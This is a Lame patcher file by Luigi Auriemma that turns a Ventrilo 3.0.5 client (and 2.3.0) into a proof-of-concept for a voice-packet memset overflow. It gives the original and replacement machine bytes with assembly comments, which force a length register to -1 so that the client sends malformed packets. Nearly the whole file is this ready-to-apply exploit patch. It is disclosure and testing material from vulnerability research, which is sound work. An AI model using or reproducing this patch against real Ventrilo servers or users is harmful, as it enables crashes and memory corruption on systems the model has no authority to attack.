====================================================================================
#
# this file has been created for the Lame patcher program available for both *nix
# and Windows platforms.
# You need this program for continuing the patching of your files:
#
#   http://aluigi.org/mytoolz.htm#lpatch
#
# Quick step-by-step for Windows:
# - launch lpatch.exe
# - select this ventrilomemset.lpatch file
# - read the message windows and click yes
# - select the file (usually executables or dlls) to patch
# - read the message windows to know if everything has been patched correctly
# - test your game

TITLE
Ventrilo <= 3.0.5 voice packet memset overflow 0.1
by Luigi Auriemma
e-mail: aluigi@autistici.org
web:    aluigi.org

INTRO
This patch converts a normal Ventrilo client 3.0.5 into a proof-of-concept
for testing the vulnerability described here:

  http://aluigi.org/adv/ventrilomemset-adv.txt

FILE
ventrilo.exe

# 3.0.5
BYTES_ORIGINAL
8B 56 08                ; MOV EDX,DWORD PTR DS:[ESI+8]
89 50 14                ; MOV DWORD PTR DS:[EAX+14],EDX
80 BB 9C 36 00 00 00    ; CMP BYTE PTR DS:[EBX+369C],0
74 09                   ; JE SHORT Ventrilo.00446C7C
B9 01 00 00 00          ; MOV ECX,1
BYTES_PATCH
33 D2                   ; XOR EDX,EDX
4A                      ; DEC EDX

# 2.3.0
BYTES_ORIGINAL
EB B4                   ; JMP SHORT Ventrilo.004231B6
8B 4E 08                ; MOV ECX,DWORD PTR DS:[ESI+8]
6A 00                   ; PUSH 0
89 48 1C                ; MOV DWORD PTR DS:[EAX+1C],ECX
BYTES_PATCH
?? ??
33 C9                   ; XOR ECX,ECX
49                      ; DEC ECX
====================================================================================